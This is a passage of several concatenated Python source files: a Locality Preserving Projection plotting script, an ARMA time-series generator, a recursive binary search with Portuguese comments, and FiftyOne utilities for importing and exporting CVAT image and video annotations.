W[j,i] = 1 return W def lpp(X, W): """ Locality Preserving Projection (LPP). Args: X: data matrix of size n x d (n samples, dimensionality d) W: similarity(affinity) matrix of size n x n (pair-wise similarities matrix) Returns: B = [y1|y2|...|ym] of size d x m, where: y1(e1), y2(e2),...ym(em) are solutions (eigenvector,eigenvalue) of a generalized eigenvalue problem: X L tX y = e X D tX y and e1 <= e2 <= .... <= em (the m smallest eigenvalues). """ D = np.diag(np.sum(W, axis=1)) L = D - W # construct graph-Laplacian matrix def matprod(*args): return reduce(np.dot, args) A = matprod(X.T, L, X) B = matprod(X.T, D, X) #d = B.shape[0] #Id = np.eye(d) evals, V = eig(A, B) # w are sorted in INCREASING order. y_i = V[:,i] = i-th column of V # Need to sort in an increasing order sorted_indices = np.argsort(evals) V = V[:,sorted_indices] return evals, V def lpp_transform(X, V, ncomp=2): """ Args: -------------- X: n x d. Data matrix V: d x m. Each column of V is a LPP direction. ncomp (<= m <= d): The dimension of transformed data Returns: -------------- tr_X: n x ncomp """ _, m = V.shape if ncomp > m: ncomp = m tr_X = np.dot(X, V[:,0:ncomp]) return tr_X def main(X, figname, sim_type='dist_based'): """ Main program: Locality Preserving Projection Algorithm Args: ----------- X: n x d matrix of n samples. figname: filename to save a plot figure. sim_type: similarity matrix type, 'dist_based' for distance based similarity 'local_scaling' for local scaling based similarity 'knn' for knn based similarity. """ if sim_type == 'dist_based': W = dist_based_sim(X, gamma=0.5) elif sim_type == 'local_scaling': W = local_scaling_based_sim(X, kv=7) elif sim_type == 'knn': W = knn_based_sim(X, kv=50) else: raise ValueError, "Invalid similarity type!" _, V = lpp(X, W) xmean = np.mean(X, axis=0) pca = PCA(n_components=2, whiten=True).fit(X) pmean = pca.mean_ pcs = pca.components_ def plot_pca_dir(pc): plt.plot([k*pc[0]+pmean[0] for k in np.linspace(-0.5,0.5)], [k*pc[1]+pmean[1] for k in np.linspace(-0.5,0.5)], 'm-', lw=4, label='PCA') def plot_lpp_dir(direction): """ Plot LPP direction. """ plt.plot([xmean[0]+k*direction[0] for k in np.linspace(-0.8,0.8)], [xmean[1]+k*direction[1] for k in np.linspace(-0.8,0.8)], 'g-', lw=4, label='LPP') first_dir = V[:,0] fig = plt.figure() fig.clf() #plt.scatter(X[:,0], X[:,1], c='r', marker='x', label='original data') plt.scatter(X[:,0], X[:,1], c='r', marker='x') plot_pca_dir(pcs[0]) plot_lpp_dir(first_dir) plt.legend(loc='best', prop={'size':20}) plt.axis('equal') plt.savefig(figname) def lpp_for_4d_data(filename='4d-x.txt'): X = [] with open(filename, 'r') as fin: for line in fin: X.append(map(float, line.strip().split(','))) X = np.asarray(X, dtype='float64') #W = knn_based_sim(X, kv=2) #W = dist_based_sim(X, gamma=0.5) W = local_scaling_based_sim(X, kv=7) _, V = lpp(X, W) trX = lpp_transform(X, V, ncomp=2) plotData(trX, figname='local7-lpp-4dto2d.eps') def lpp4Iris(): from sklearn.datasets import load_iris iris = load_iris() X = iris.data Y = iris.target cs = ['b', 'g', 'r'] ms = ['+', 'o', 'x'] lb = ['setosa', 'versicolor', 'virginica'] k = 5 ncomp = 2 #W = local_scaling_based_sim(X, kv=k) W = knn_based_sim(X, kv=k) _, V = lpp(X, W) trX = lpp_transform(X, V, ncomp=ncomp) fig = plt.figure() fig.clf() if ncomp == 3: ax = fig.add_subplot(111, projection='3d') for i in range(3): ax.plot(trX[Y==i,0], trX[Y==i,1], trX[Y==1,2], cs[i]+ms[i], label=lb[i]) ax.view_init(50, 70) plt.legend(loc='best', prop={'size':20}) #plt.savefig('3d/local-%dnn-iris-3d.eps' % k) plt.savefig('3d/%dnn-iris-3d.png' % k) elif ncomp == 2: for i in range(3): plt.plot(trX[Y==i,0], trX[Y==i,1], cs[i]+ms[i], label=lb[i]) plt.legend(loc='best', prop={'size':20}) #plt.savefig('2d/local-%dnn-iris-2d.eps' % k) plt.savefig('2d/%dnn-iris-2d.png' % k) else: pass def lpp4Digits(): from sklearn.datasets import load_digits digit = load_digits(3) X = digit.data Y = digit.target lb = ['0', '1', '2'] cs = ['b', 'g', 'r'] ms = ['+', 'o', 'x'] ncomp = 2 #W = knn_based_sim(X, kv=7) W = local_scaling_based_sim(X, kv=20) _, V = lpp(X, W) tr_data = lpp_transform(X, V, ncomp=ncomp) fig = plt.figure() fig.clf() if ncomp == 2: for i in range(3): plt.plot(tr_data[Y==i,0], tr_data[Y==i,1], cs[i]+ms[i], label=lb[i]) plt.legend(loc='best', prop={'size':20}) plt.savefig('lpp-digit-2d.png') elif ncomp == 3: ax = fig.add_subplot(111, projection='3d') for i in range(3): ax.plot(tr_data[Y==i,0], tr_data[Y==i,1], tr_data[Y==i,2], cs[i]+ms[i], label=lb[i]) ax.legend(loc='best', prop={'size':20}) ax.view_init(50, 70) plt.savefig('lpp-digit-3d.png') if __name__ == '__main__': #X = loadData('2d-2.txt') #plotData(X, 'original-2d-1.png') #main(X, 'knn_based_lpp_2d_1.eps', sim_type='knn') #main(X, '2d_2.eps', sim_type='knn') #lpp_for_4d_data() lpp4Iris()
import numpy as np class ARMA: """Class that generates WN, AR, MA and ARMA processes.""" @staticmethod def generate_wn(n, sigma=1): """Generates a white noise series. The code follows: y_{t} = \epsilon_{t} Args: n: length of the series. sigma: standard deviation of the innovations. Returns: np.Array with the series. """ return np.random.normal(0, sigma, size=n) @staticmethod def generate_ma(n, thetas, mu, sigma=1): """Generates a moving average series. The code follows: y_{t} = \mu + \epsilon_{t} + \theta_{1}\epsilon_{t-1} + \theta_{2}\epsilon_{t-2} + ... + \theta_{q}\epsilon_{t-q} Args: n: length of the series. thetas: list of thetas, in the order \theta_{1}, \theta_{2}, ..., \theta_{q}. mu: base constant. sigma: standard deviation of the innovations (optional). Returns: np.Array with the series. """ q = len(thetas) adj_n = n + q # We add q values because at the beginning we have no thetas available. e_series = ARMA.generate_wn(adj_n, sigma) # Generating a white noise. ma = [] for i in range(1, adj_n): visible_thetas = thetas[0:min(q, i)] # At first, we only "see" some of the thetas. visible_e_series = e_series[i - min(q, i):i] # The same happens to the white noise. reversed_thetas = visible_thetas[::-1] try: # Getting e_t if we can. e_t = visible_e_series[-1] except IndexError: e_t = 0 # Main equation. ma_t = mu + e_t + np.dot(reversed_thetas, visible_e_series) ma.append(ma_t) ma = ma[max(q-1, 0):] # Dropping the first values that did not use all the thetas. return ma @staticmethod def generate_ar(n, phis, sigma=1): """Generates an autoregressive series. The code follows: y_{t} = \phi_{1} y_{t-1} + \phi_{2} y_{t-2} + ... + \phi_{p} y_{t-p} + \epsilon_{t} Args: n: length of the series. phis: list of thetas, in the order \phi_{1}, \phi_{2}, ..., \phi_{p}. sigma: standard deviation of the innovations (optional). Returns: np.Array with the series. """ p = len(phis) adj_n = n + p # We add q values because at the beginning we have no phis available. e_series = ARMA.generate_wn(adj_n, sigma) # Generating a white noise. ar = [e_series[0]] # We start the series with a random value for i in range(1, adj_n): visible_phis = phis[0:min(p, i)] # At first, we only "see" some of the phis. visible_series = ar[i - min(p, i):i] # The same happens to the white noise. reversed_phis = visible_phis[::-1] # Main equation. ar_t = e_series[i] + np.dot(reversed_phis, visible_series) ar.append(ar_t) ar = ar[p:] # Dropping the first values that did not use all the phis. return ar @staticmethod def generate_arma(n, phis, thetas, mu, sigma=1): """Generates an autoregressive moving average series. The code follows: y_{t} = \mu + \phi_{1} y_{t-1} + \phi_{2} y_{t-2} + ... + \phi_{p} y_{t-p} + \epsilon_{t} + \theta_{1}\epsilon_{t-1} + \theta_{2}\epsilon_{t-2} + ... + \theta_{q}\epsilon_{t-q} Args: n: length of the series. phis: list of thetas, in the order \phi_{1}, \phi_{2}, ..., \phi_{p}. thetas: list of thetas, in the order \theta_{1}, \theta_{2}, ..., \theta_{q}. mu: base constant. sigma: standard deviation of the innovations (optional). Returns: np.Array with the series. """ p = len(phis) q = len(thetas) adj_n = n + max(p, q) # We use max to make sure we cover the lack of coefficients. e_series = ARMA.generate_wn(adj_n) # Base white noise. arma = [e_series[0]] # We start the series with a random value (same as AR). for i in range(1, adj_n): visible_phis = phis[0:min(p, i)] visible_thetas = thetas[0:min(q, i)] reversed_phis = visible_phis[::-1] reversed_thetas = visible_thetas[::-1] visible_series = arma[i - min(p, i):i] visible_e_series = e_series[i - min(q, i):i] try: # Getting e_t if we can. e_t = visible_e_series[-1] except IndexError: e_t = 0 # Main equation. ar_t = + np.dot(reversed_phis, visible_series) ma_t = mu + e_t + np.dot(reversed_thetas, visible_e_series) arma_t = ar_t + ma_t arma.append(arma_t) arma = arma[max(p, q):] # Dropping the first values that did not use all the phis or thetas. return arma
""" Implementação do algoritmo de busca binária com recursão """ def busca_binaria(valor, vetor, esquerda, direita): """ Implementação de um algoritmo de busca binária com recursão. Argumentos: valor: Any. Valor a ser buscado na lista vetor: list. lista ordenada na qual o valor será buscado esquerda: Any. Valor inicial da metade buscada direita: Any. Valor final da metade buscada Retorna o índice do valor em "vetor" ou -1 caso não exista nela. """ meio = int((esquerda + direita) / 2) if esquerda <= direita: if valor > vetor[meio]: esquerda = meio + 1 return busca_binaria(valor, vetor, esquerda, direita) elif valor < vetor[meio]: direita = meio - 1 return busca_binaria(valor, vetor, esquerda, direita) return meio return -1 lista = [0, 1, 3, 5, 6, 7, 8, 9, 10, 11, 12] print(busca_binaria(12, lista, 0, len(lista)))
""" Utilities for working with datasets in `CVAT format <https://github.com/opencv/cvat>`_. | Copyright 2017-2020, Voxel51, Inc. | `voxel51.com <https://voxel51.com/>`_ | """ from collections import defaultdict from datetime import datetime import logging import os import jinja2 import eta.core.data as etad import eta.core.image as etai import eta.core.utils as etau import fiftyone as fo import fiftyone.constants as foc import fiftyone.core.frame as fof import fiftyone.core.labels as fol import fiftyone.core.metadata as fom import fiftyone.core.utils as fou import fiftyone.utils.data as foud logger = logging.getLogger(__name__) class CVATImageSampleParser(foud.LabeledImageTupleSampleParser): """Parser for samples in `CVAT image format <https://github.com/opencv/cvat>`_. This implementation supports samples that are ``(image_or_path, image_tag_dict)`` tuples, where: - ``image_or_path`` is either an image that can be converted to numpy format via ``np.asarray()`` or the path to an image on disk - ``image_tag_dict`` is a JSON dictionary representation of an ``<image>`` tag of a CVAT image annotations file, which should have the following format:: { "@id": "0", "@name": "filename.jpg", "@width": "640", "@height": "480", "box": [ { "@label": "car", "@xtl": "100", "@ytl": "50", "@xbr": "325", "@ybr": "190", "@occluded": "0", "attribute": [ { "@name": "type", "#text": "sedan" }, ... ] }, ... ], ... } For unlabeled images, ``image_tag_dict`` can be ``None``. See :class:`fiftyone.types.dataset_types.CVATImageDataset` for more format details. """ def __init__(self): super().__init__() self._cvat_image_cache = None @property def label_cls(self): return fol.Detections @property def has_image_metadata(self): return True def get_image_metadata(self): cvat_image = self._cvat_image if cvat_image is None: return None return cvat_image.get_image_metadata() def get_label(self): """Returns the label for the current sample. Args: sample: the sample Returns: a :class:`fiftyone.core.labels.Detections` instance, or ``None`` if the sample is unlabeled """ cvat_image = self._cvat_image if cvat_image is None: return None return cvat_image.to_detections() def clear_sample(self): super().clear_sample() self._cvat_image_cache = None @property def _cvat_image(self): if self._cvat_image_cache is None: self._cvat_image_cache = self._parse_cvat_image() return self._cvat_image_cache def _parse_cvat_image(self): d = self.current_sample[1] return CVATImage.from_image_dict(d) if d is not None else None class CVATVideoSampleParser(foud.LabeledVideoSampleParser): """Parser for samples in `CVAT video format <https://github.com/opencv/cvat>`_. This implementation supports samples that are ``(video_path, image_tag_dict)`` tuples, where: - ``video_path`` is the path to a video on disk - ``anno_path`` is the path to a CVAT video labels XML file on disk, or ``None`` for unlabeled videos. See :class:`fiftyone.types.dataset_types.CVATVideoDataset` for more format details. """ def __init__(self): super().__init__() self._objects_field = "objects" @property def has_video_metadata(self): return False def get_video_path(self): return self.current_sample[0] def get_frame_labels(self): labels_path = self.current_sample[1] if not labels_path: return None _, _, cvat_tracks = load_cvat_video_annotations(labels_path) return _cvat_tracks_to_frames(cvat_tracks, self._objects_field) class CVATImageDatasetImporter(foud.LabeledImageDatasetImporter): """Importer for CVAT image datasets stored on disk. See :class:`fiftyone.types.dataset_types.CVATImageDataset` for format details. Args: dataset_dir: the dataset directory skip_unlabeled (False): whether to skip unlabeled images when importing shuffle (False): whether to randomly shuffle the order in which the samples are imported seed (None): a random seed to use when shuffling max_samples (None): a maximum number of samples to import. By default, all samples are imported """ def __init__( self, dataset_dir, skip_unlabeled=False, shuffle=False, seed=None, max_samples=None, ): super().__init__( dataset_dir, skip_unlabeled=skip_unlabeled, shuffle=shuffle, seed=seed, max_samples=max_samples, ) self._data_dir = None self._labels_path = None self._info = None self._images_map = None self._filenames = None self._iter_filenames = None self._num_samples = None def __iter__(self): self._iter_filenames = iter(self._filenames) return self def __len__(self): return self._num_samples def __next__(self): filename = next(self._iter_filenames) image_path = os.path.join(self._data_dir, filename) cvat_image = self._images_map.get(filename, None) if cvat_image is not None: # Labeled image image_metadata = cvat_image.get_image_metadata() detections = cvat_image.to_detections() else: # Unlabeled image image_metadata = fom.ImageMetadata.build_for(image_path) detections = None return image_path, image_metadata, detections @property def has_dataset_info(self): return True @property def has_image_metadata(self): return True @property def label_cls(self): return fol.Detections def setup(self): self._data_dir = os.path.join(self.dataset_dir, "data") self._labels_path = os.path.join(self.dataset_dir, "labels.xml") if os.path.isfile(self._labels_path): info, _, cvat_images = load_cvat_image_annotations( self._labels_path ) else: info = {} cvat_images = [] self._info = info # Index by filename self._images_map = {i.name: i for i in cvat_images} filenames = etau.list_files(self._data_dir, abs_paths=False) if self.skip_unlabeled: filenames = [f for f in filenames if f in self._images_map] self._filenames = self._preprocess_list(filenames) self._num_samples = len(self._filenames) def get_dataset_info(self): return self._info class CVATVideoDatasetImporter(foud.LabeledVideoDatasetImporter): """Importer for CVAT video datasets stored on disk. See :class:`fiftyone.types.dataset_types.CVATVideoDataset` for format details. Args: dataset_dir: the dataset directory skip_unlabeled (False): whether to skip unlabeled videos when importing shuffle (False): whether to randomly shuffle the order in which the samples are imported seed (None): a random seed to use when shuffling max_samples (None): a maximum number of samples to import. By default, all samples are imported """ def __init__( self, dataset_dir, skip_unlabeled=False, shuffle=False, seed=None, max_samples=None, ): super().__init__( dataset_dir, skip_unlabeled=skip_unlabeled, shuffle=shuffle, seed=seed, max_samples=max_samples, ) self._objects_field = "objects" self._info = None self._cvat_task_labels = None self._uuids_to_video_paths = None self._uuids_to_labels_paths = None self._uuids = None self._iter_uuids = None self._num_samples = None def __iter__(self): self._iter_uuids = iter(self._uuids) return self def __len__(self): return self._num_samples def __next__(self): uuid = next(self._iter_uuids) video_path = self._uuids_to_video_paths[uuid] labels_path = self._uuids_to_labels_paths.get(uuid, None) if labels_path: # Labeled video info, cvat_task_labels, cvat_tracks = load_cvat_video_annotations( labels_path ) if self._info is None: self._info = info self._cvat_task_labels.merge_task_labels(cvat_task_labels) self._info["task_labels"] = self._cvat_task_labels.labels frames = _cvat_tracks_to_frames(cvat_tracks, self._objects_field) else: # Unlabeled video frames = None return video_path, None, frames @property def has_dataset_info(self): return True @property def has_video_metadata(self): return False # has (width, height) but not other important info def setup(self): to_uuid = lambda p: os.path.splitext(os.path.basename(p))[0] data_dir = os.path.join(self.dataset_dir, "data") if os.path.isdir(data_dir): self._uuids_to_video_paths = { to_uuid(p): p for p in etau.list_files(data_dir, abs_paths=True) } else: self._uuids_to_video_paths = {} labels_dir = os.path.join(self.dataset_dir, "labels") if os.path.isdir(labels_dir): self._uuids_to_labels_paths = { to_uuid(p): p for p in etau.list_files(labels_dir, abs_paths=True) } else: self._uuids_to_labels_paths = {} if self.skip_unlabeled: uuids = sorted(self._uuids_to_labels_paths.keys()) else: uuids = sorted(self._uuids_to_video_paths.keys()) self._info = None self._uuids = self._preprocess_list(uuids) self._num_samples = len(self._uuids) self._cvat_task_labels = CVATTaskLabels() def get_dataset_info(self): return self._info class CVATImageDatasetExporter(foud.LabeledImageDatasetExporter): """Exporter that writes CVAT image datasets to disk. See :class:`fiftyone.types.dataset_types.CVATImageDataset` for format details. Args: export_dir: the directory to write the export image_format (None): the image format to use when writing in-memory images to disk. By default, ``fiftyone.config.default_image_ext`` is used """ def __init__(self, export_dir, image_format=None): if image_format is None: image_format = fo.config.default_image_ext super().__init__(export_dir) self.image_format = image_format self._name = None self._task_labels = None self._data_dir = None self._labels_path = None self._cvat_images = None self._filename_maker = None @property def requires_image_metadata(self): return True @property def label_cls(self): return fol.Detections def setup(self): self._data_dir = os.path.join(self.export_dir, "data") self._labels_path = os.path.join(self.export_dir, "labels.xml") self._cvat_images = [] self._filename_maker = fou.UniqueFilenameMaker( output_dir=self._data_dir, default_ext=self.image_format ) def log_collection(self, sample_collection): self._name = sample_collection.name self._task_labels = sample_collection.info.get("task_labels", None) def export_sample(self, image_or_path, detections, metadata=None): out_image_path = self._export_image_or_path( image_or_path, self._filename_maker ) if detections is None: return if metadata is None: metadata = fom.ImageMetadata.build_for(out_image_path) cvat_image = CVATImage.from_detections(detections, metadata) cvat_image.id = len(self._cvat_images) cvat_image.name = os.path.basename(out_image_path) self._cvat_images.append(cvat_image) def close(self, *args): # Get task labels if self._task_labels is None: # Compute task labels from active label schema cvat_task_labels = CVATTaskLabels.from_cvat_images( self._cvat_images ) else: # Use task labels from logged collection info cvat_task_labels = CVATTaskLabels(labels=self._task_labels) # Write annotations writer = CVATImageAnnotationWriter() writer.write( cvat_task_labels, self._cvat_images, self._labels_path, id=0, name=self._name, ) class CVATVideoDatasetExporter(foud.LabeledVideoDatasetExporter): """Exporter that writes CVAT video datasets to disk. See :class:`fiftyone.types.dataset_types.CVATVideoDataset` for format details. Args: export_dir: the directory to write the export """ def __init__(self, export_dir): super().__init__(export_dir) self._task_labels = None self._data_dir = None self._labels_dir = None self._filename_maker = None self._writer = None self._num_samples = 0 @property def requires_video_metadata(self): return True def setup(self): self._data_dir = os.path.join(self.export_dir, "data") self._labels_dir = os.path.join(self.export_dir, "labels") self._filename_maker = fou.UniqueFilenameMaker( output_dir=self._data_dir ) self._writer = CVATVideoAnnotationWriter() etau.ensure_dir(self._data_dir) etau.ensure_dir(self._labels_dir) def log_collection(self, sample_collection): self._task_labels = sample_collection.info.get("task_labels", None) def export_sample(self, video_path, frames, metadata=None): out_video_path = self._export_video(video_path, self._filename_maker) if frames is None: return if metadata is None: metadata = fom.VideoMetadata.build_for(out_video_path) name_with_ext = os.path.basename(out_video_path) name = os.path.splitext(name_with_ext)[0] out_anno_path = os.path.join(self._labels_dir, name + ".xml") # Generate object tracks frame_size = (metadata.frame_width, metadata.frame_height) cvat_tracks = _frames_to_cvat_tracks(frames, frame_size) # Get task labels if self._task_labels is None: # Compute task labels from active label schema cvat_task_labels = CVATTaskLabels.from_cvat_tracks(cvat_tracks) else: # Use task labels from logged collection info cvat_task_labels = CVATTaskLabels(labels=self._task_labels) # Write annotations self._num_samples += 1 self._writer.write( cvat_task_labels, cvat_tracks, metadata, out_anno_path, id=self._num_samples - 1, name=name_with_ext, ) class CVATTaskLabels(object): """Description of the labels in a CVAT image annotation task. Args: labels (None): a list of label dicts in the following format:: [ { "name": "car", "attributes": [ { "name": "type" "categories": ["coupe", "sedan", "truck"] }, ... } }, ... ] """ def __init__(self, labels=None): self.labels = labels or [] def merge_task_labels(self, task_labels): """Merges the given :class:`CVATTaskLabels` into this instance. Args: task_labels: a :class:`CVATTaskLabels` """ schema = self.to_schema() schema.merge_schema(task_labels.to_schema()) new_task_labels = CVATTaskLabels.from_schema(schema) self.labels = new_task_labels.labels def to_schema(self): """Returns an ``eta.core.image.ImageLabelsSchema`` representation of the task labels. Returns: an ``eta.core.image.ImageLabelsSchema`` """ schema = etai.ImageLabelsSchema() for label in self.labels: _label = label["name"] schema.add_object_label(_label) for attribute in label.get("attributes", []): _name = attribute["name"] _categories = attribute["categories"] for _value in _categories: _attr = etad.CategoricalAttribute(_name, _value) schema.add_object_attribute(_label, _attr) return schema @classmethod def from_cvat_images(cls, cvat_images): """Creates a :class:`CVATTaskLabels` instance that describes the active schema of the given annotations. Args: cvat_images: a list of :class:`CVATImage` instances Returns: a :class:`CVATTaskLabels` """ schema = etai.ImageLabelsSchema() for cvat_image in cvat_images: for box in cvat_image.boxes: _label = box.label schema.add_object_label(_label) if box.occluded is not None: schema.add_object_attribute("occluded", box.occluded) for attr in box.attributes: _attr = attr.to_eta_attribute() schema.add_object_attribute(_label, _attr) return cls.from_schema(schema) @classmethod def from_cvat_tracks(cls, cvat_tracks): """Creates a :class:`CVATTaskLabels` instance that describes the active schema of the given annotations. Args: cvat_tracks: a list of :class:`CVATTrack` instances Returns: a :class:`CVATTaskLabels` """ schema = etai.ImageLabelsSchema() for cvat_track in cvat_tracks: for box in cvat_track.boxes.values(): _label = box.label schema.add_object_label(_label) if box.outside is not None: schema.add_object_attribute("outside", box.outside) if box.occluded is not None: schema.add_object_attribute("occluded", box.occluded) if box.keyframe is not None: schema.add_object_attribute("keyframe", box.keyframe) for attr in box.attributes: _attr = attr.to_eta_attribute() schema.add_object_attribute(_label, _attr) return cls.from_schema(schema) @classmethod def from_labels_dict(cls, d): """Creates a :class:`CVATTaskLabels` instance from the ``<labels>`` tag of a CVAT image annotation XML file. Args: d: a dict representation of a ``<labels>`` tag Returns: a :class:`CVATTaskLabels` """ labels = _ensure_list(d.get("label", [])) _labels = [] for label in labels: _tmp = label.get("attributes", None) or {} attributes = _ensure_list(_tmp.get("attribute", [])) _attributes = [] for attribute in attributes: _attributes.append( { "name": attribute["name"], "categories": attribute["values"].split("\n"), } ) _labels.append({"name": label["name"], "attributes": _attributes}) return cls(labels=_labels) @classmethod def from_schema(cls, schema): """Creates a :class:`CVATTaskLabels` instance from an ``eta.core.image.ImageLabelsSchema``. Args: schema: an ``eta.core.image.ImageLabelsSchema`` Returns: a :class:`CVATTaskLabels` """ labels = [] obj_schemas = schema.objects for label in sorted(obj_schemas.schema): obj_schema = obj_schemas.schema[label] obj_attr_schemas = obj_schema.attrs attributes = [] for name in sorted(obj_attr_schemas.schema): attr_schema = obj_attr_schemas.schema[name] if isinstance(attr_schema, etad.CategoricalAttributeSchema): attributes.append( { "name": name, "categories": sorted(attr_schema.categories), } ) labels.append({"name": label, "attributes": attributes}) return cls(labels=labels) class CVATImage(object): """An annotated image in CVAT image format. Args: id: the ID of the image name: the filename of the image width: the width of the image, in pixels height: the height of the image, in pixels boxes (None): a list of :class:`CVATImageBox` instances """ def __init__(self, id, name, width, height, boxes=None): self.id = id self.name = name self.width = width self.height = height self.boxes = boxes or [] def get_image_metadata(self): """Returns a :class:`fiftyone.core.metadata.ImageMetadata` instance for the annotations. Returns: a :class:`fiftyone.core.metadata.ImageMetadata` """ return fom.ImageMetadata(width=self.width, height=self.height) def to_detections(self): """Returns a :class:`fiftyone.core.labels.Detections` representation of the annotations. Returns: a :class:`fiftyone.core.labels.Detections` """ frame_size = (self.width, self.height) detections = [box.to_detection(frame_size) for box in self.boxes] return fol.Detections(detections=detections) @classmethod def from_detections(cls, detections, metadata): """Creates a :class:`CVATImage` from a :class:`fiftyone.core.labels.Detections`. Args: detections: a :class:`fiftyone.core.labels.Detections` metadata: a :class:`fiftyone.core.metadata.ImageMetadata` for the image Returns: a :class:`CVATImage` """ width = metadata.width height = metadata.height boxes = [ CVATImageBox.from_detection(d, metadata) for d in detections.detections ] return cls(None, None, width, height, boxes=boxes) @classmethod def from_image_dict(cls, d): """Creates a :class:`CVATImage` from an ``<image>`` tag of a CVAT image annotations XML file. Args: d: a dict representation of an ``<image>`` tag Returns: a :class:`CVATImage` """ id = d["@id"] name = d["@name"] width = int(d["@width"]) height = int(d["@height"]) boxes = [] for box in _ensure_list(d.get("box", [])): boxes.append(CVATImageBox.from_box_dict(box)) return cls(id, name, width, height, boxes=boxes) class CVATImageBox(object): """An object bounding box (with attributes) in CVAT image format. Args: label: the object label string xtl: the top-left x-coordinate of the box, in pixels ytl: the top-left y-coordinate of the box, in pixels xbr: the bottom-right x-coordinate of the box, in pixels ybr: the bottom-right y-coordinate of the box, in pixels occluded (None): whether the object is occluded attributes (None): a list of :class:`CVATAttribute` instances """ def __init__( self, label, xtl, ytl, xbr, ybr, occluded=None, attributes=None ): self.label = label self.xtl = xtl self.ytl = ytl self.xbr = xbr self.ybr = ybr self.occluded = occluded self.attributes = attributes or [] def to_detection(self, frame_size): """Returns a :class:`fiftyone.core.labels.Detection` representation of the box. Args: frame_size: the ``(width, height)`` of the image Returns: a :class:`fiftyone.core.labels.Detection` """ label = self.label width, height = frame_size bounding_box = [ self.xtl / width, self.ytl / height, (self.xbr - self.xtl) / width, (self.ybr - self.ytl) / height, ] attributes = {a.name: a.to_attribute() for a in self.attributes} if self.occluded is not None: attributes["occluded"] = fol.BooleanAttribute(value=self.occluded) return fol.Detection( label=label, bounding_box=bounding_box, attributes=attributes, ) @classmethod def from_detection(cls, detection, metadata): """Creates a :class:`CVATImageBox` from a :class:`fiftyone.core.labels.Detection`. Args: detection: a :class:`fiftyone.core.labels.Detection` metadata: a :class:`fiftyone.core.metadata.ImageMetadata` for the image Returns: a :class:`CVATImageBox` """ label = detection.label width = metadata.width height = metadata.height x, y, w, h = detection.bounding_box xtl = int(round(x * width)) ytl = int(round(y * height)) xbr = int(round((x + w) * width)) ybr = int(round((y + h) * height)) occluded = None if detection.attributes: supported_attrs = ( fol.BooleanAttribute, fol.CategoricalAttribute, fol.NumericAttribute, ) attributes = [] for name, attr in detection.attributes.items(): if name == "occluded": occluded = attr.value elif isinstance(attr, supported_attrs): attributes.append(CVATAttribute(name, attr.value)) else: attributes = None return cls( label, xtl, ytl, xbr, ybr, occluded=occluded, attributes=attributes ) @classmethod def from_box_dict(cls, d): """Creates a :class:`CVATImageBox` from a ``<box>`` tag of a CVAT image annotation XML file. Args: d: a dict representation of a ``<box>`` tag Returns: a :class:`CVATImageBox` """ label = d["@label"] xtl = int(round(float(d["@xtl"]))) ytl = int(round(float(d["@ytl"]))) xbr = int(round(float(d["@xbr"]))) ybr = int(round(float(d["@ybr"]))) occluded = d.get("@occluded", None) if occluded is not None: occluded = bool(int(occluded)) attributes = [] for attr in _ensure_list(d.get("attribute", [])): name = attr["@name"].lstrip("@") value = attr["#text"] try: value = float(value) except: pass attributes.append(CVATAttribute(name, value)) return cls( label, xtl, ytl, xbr, ybr, occluded=occluded, attributes=attributes ) class CVATTrack(object): """An annotated object track in CVAT video format. Args: id: the ID of the track label: the label for the track width: the width of the video frames, in pixels height: the height of the video frames, in pixels boxes (None): a dict mapping frame numbers to :class:`CVATVideoBox` instances """ def __init__(self, id, label, width, height, boxes=None): self.id = id self.label = label self.width = width self.height = height self.boxes = boxes or {} def to_detections(self): """Returns a :class:`fiftyone.core.labels.Detection` representation of the annotations. Returns: a dictionary mapping frame numbers to :class:`fiftyone.core.labels.Detection` instances """ frame_size = (self.width, self.height) detections = {} for frame_number, box in self.boxes.items(): detection = box.to_detection(frame_size) detection.index = self.id detections[frame_number] = detection return detections @classmethod def from_detections(cls, id, detections, frame_size): """Creates a :class:`CVATTrack` from a dictionary of :class:`fiftyone.core.labels.Detection` instances. Args: id: the ID of the track detections: a dict mapping frame numbers to :class:`fiftyone.core.labels.Detection` instances frame_size: the ``(width, height)`` of the video frames Returns: a :class:`CVATTrack` """ width, height = frame_size boxes = {} label = None for frame_number, detection in detections.items(): label = detection.label boxes[frame_number] = CVATVideoBox.from_detection( frame_number, detection, frame_size ) return cls(id, label, width, height, boxes=boxes) @classmethod def from_track_dict(cls, d, frame_size): """Creates a :class:`CVATTrack` from a ``<track>`` tag of a CVAT video annotation XML file. Args: d: a dict representation of an ``<track>`` tag frame_size: the ``(width, height)`` of the video frames Returns: a :class:`CVATTrack` """ id = d["@id"] label = d["@label"] width, height = frame_size boxes = {} for box_dict in _ensure_list(d.get("box", [])): box = CVATVideoBox.from_box_dict(label, box_dict) boxes[box.frame] = box return cls(id, label, width, height, boxes=boxes) class CVATVideoBox(object): """An object bounding box (with attributes) in CVAT video format. Args: frame: the frame number label: the object label string xtl: the top-left x-coordinate of the box, in pixels ytl: the top-left y-coordinate of the box, in pixels xbr: the bottom-right x-coordinate of the box, in pixels ybr: the bottom-right y-coordinate of the box, in pixels outside (None): whether the object is truncated by the frame edge occluded (None): whether the object is occluded keyframe (None): whether the frame is a key frame attributes (None): a list of :class:`CVATAttribute` instances """ def __init__( self, frame, label, xtl, ytl, xbr, ybr, outside=None, occluded=None, keyframe=None, attributes=None, ): self.frame = frame self.label = label self.xtl = xtl self.ytl = ytl self.xbr = xbr self.ybr = ybr self.outside = outside self.occluded = occluded self.keyframe = keyframe self.attributes = attributes or [] def to_detection(self, frame_size): """Returns a :class:`fiftyone.core.labels.Detection` representation of the box. Args: frame_size: the ``(width, height)`` of the video frames Returns: a :class:`fiftyone.core.labels.Detection` """ label = self.label width, height = frame_size bounding_box = [ self.xtl / width, self.ytl / height, (self.xbr - self.xtl) / width, (self.ybr - self.ytl) / height, ] attributes = {a.name: a.to_attribute() for a in self.attributes} if self.outside is not None: attributes["outside"] = fol.BooleanAttribute(value=self.outside) if self.occluded is not None: attributes["occluded"] = fol.BooleanAttribute(value=self.occluded) if self.keyframe is not None: attributes["keyframe"] = fol.BooleanAttribute(value=self.keyframe) return fol.Detection( label=label, bounding_box=bounding_box, attributes=attributes, ) @classmethod def from_detection(cls, frame_number, detection, frame_size): """Creates a :class:`CVATVideoBox` from a :class:`fiftyone.core.labels.Detection`. Args: frame_number: the frame number detection: a :class:`fiftyone.core.labels.Detection` frame_size: the ``(width, height)`` of the video frames Returns: a :class:`CVATVideoBox` """ label = detection.label width, height = frame_size x, y, w, h = detection.bounding_box xtl = int(round(x * width)) ytl = int(round(y * height)) xbr = int(round((x + w) * width)) ybr = int(round((y + h) * height)) outside = None occluded = None keyframe = None if 